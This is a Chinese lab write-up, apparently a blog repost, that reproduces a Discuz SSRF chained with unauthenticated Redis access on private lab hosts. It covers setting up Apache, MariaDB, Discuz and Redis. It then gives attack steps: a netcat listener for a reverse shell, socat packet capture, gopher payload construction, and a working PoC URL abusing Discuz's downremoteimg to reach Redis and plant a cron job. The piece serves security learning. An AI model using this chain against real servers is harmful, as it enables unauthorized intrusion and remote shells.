未授权访问漏洞之Redis漏洞复现
前言未授权访问漏洞简写是SSRF(Server-Side Request Forgery:服务器端请求伪造),是一种服务器端提供了可以从其他服务器获取资源和数据的功能,但没有对目标地址进行过滤和限制,导致可以任意访问服务器端获取数据资源的漏洞,我们本次复现用到的是discuz+redis的环境
Redis漏洞原理
Redis默认的绑定端口是0.0.0.0:6379,如果没有在设置密码或者密码为弱密码的情况下且没有使用有效的保护措施,如此一来,在公网的Redis服务器就会被任意的用户进行未授权访问,读取数据,获取资源,写入恶意文件等。
靶场环境
攻击机: kali: 192.168.31.153
测试机: centos7-1: 192.168.31.207
靶机: centos7-2: 192.168.31.230
所需要的环境和脚本链接:https://pan.baidu.com/s/1YE749PP1RcNGJYrpxMvE_A?pwd=xihw
安装discuz+Redis环境
discuz搭建
centos7-2下载安装discuz,首先搭建apache服务器yum install -y httpd httpd-devel
service httpd.service start //开启apache服务
service httpd.service status //查看apache状态
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221220000042318-1057948370.png
安装mysql,在centos中的mysql是mariadb,而不是mysql
yum -y install mariadb mariadb-server mariadb-libs mariadb-devel //安装
service mariadb.service start //启动mariadb服务
service mariadb.service status //查看状态
netstat -an //查看端口https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221220000630627-1220042861.png
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221220000806333-2052774090.png
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221220000850514-1802245226.png
安装php,将php和mysql关联起来
yum install -y php
yum -y install php-mysqlhttps://img2023.cnblogs.com/blog/2913000/202212/2913000-20221220001056572-1909208370.png
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221220001153067-1045594121.png
将下载的discuz放到/var/www/html下,并赋予可读可写权限
chown apache:apache -R upload/ //赋予所属组
chmod -R 777 upload///赋予可读可写可执行权限
service httpd.service restart //这里如果已经安装了httpd就重启一下服务就好
service mariadb.service restart //同上
service firewalld stop //关闭防火墙在物理机访问
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221220004257682-1710304632.png
这里都是不可写,需要修改/etc/selinux/config,修改完重启虚拟机 reboot
重启完成后开启apache服务和mariadb服务,再次访问就是可写
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221220004507012-1262479154.png
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221220004709269-1516421905.png
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221220001741854-1501740086.png
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221220003833363-1593410254.png
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221220005343506-1875198744.png
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221220005450306-314731301.png
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221220005647452-861469915.png
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221220005829282-1578351590.png
redis搭建
1.下载redis包 解压进入redis目录 2.make编译3.然后编译完成进入/src目录 4.将redis-cliredis-server复制到/usr/local/bin目录下,如此可以在任意目录下运行redis服务
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221219224208828-880010163.png
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221219224439054-1941086341.png
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221219224617798-619895953.png
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221219224813724-784896458.png
执行redis-server,出现以下界面说明搭建成功一半,另一半自己重新开一个终端,执行redis-cli ,出现第二张图示例说明搭建成功
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221219225256914-479937938.png
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221219225500209-703473571.png
漏洞复现
首先在centos7-1下载安装redis环境,然后用于测试脚本,这是我事先准备好的脚本
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221219231551600-1156216463.png
给kali监听6666端口 nc -lvnp 6666
centos7-1 执行 bash aa.sh 127.0.0.1 6379 ,大概等一分钟,查看kali1是否反弹权限
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221219231840878-130676899.png
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221219231911696-1239503775.png
测试成功,接下来查看并删除centos7-1计划任务,使用socat端口转发工具(如果没有就使用yum install socat下载),用来抓取redis攻击的数据包,再使用万金油gopher协议构造poc
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221219232148698-907102314.png
将2222端口数据转发给6379
socat -v tcp-listen:2222,fork tcp-connect:localhost:6379
bash aa.sh 127.0.0.1 2222
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221219232801469-467927629.png
将数据包编写到一个mm.log中,复制完,保存前先要查看一下文件是不是fileformat=unix
按esc键 然后 :set ff 查看 显示fileformat=unix
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221219233245319-922982078.png
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221219233635321-863499996.png
然后就是要用到一个python脚本,可以将保存下来的东西保存为RESP格式,而gopher万金油协议就刚好支持这个格式
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221219234409699-805386095.png
将代码复制到kali,新建一个go.php,然后保存退出,开始攻击
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221220010611376-1780068928.png
kali:
nc -lnvp 6666
poc:
http://192.168.31.230/discuz/upload/forum.php?mod=ajax&action=downremoteimg&message=http://192.168.31.153/go.php?data=he2lo.jpg
执行之前,记得开启centos7-2的redis-server能看到centos7-2有计划任务,kali有反弹,复现成功,ip是centos7-2的ip
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221220012037847-349960975.png
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221220012208620-1233256580.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]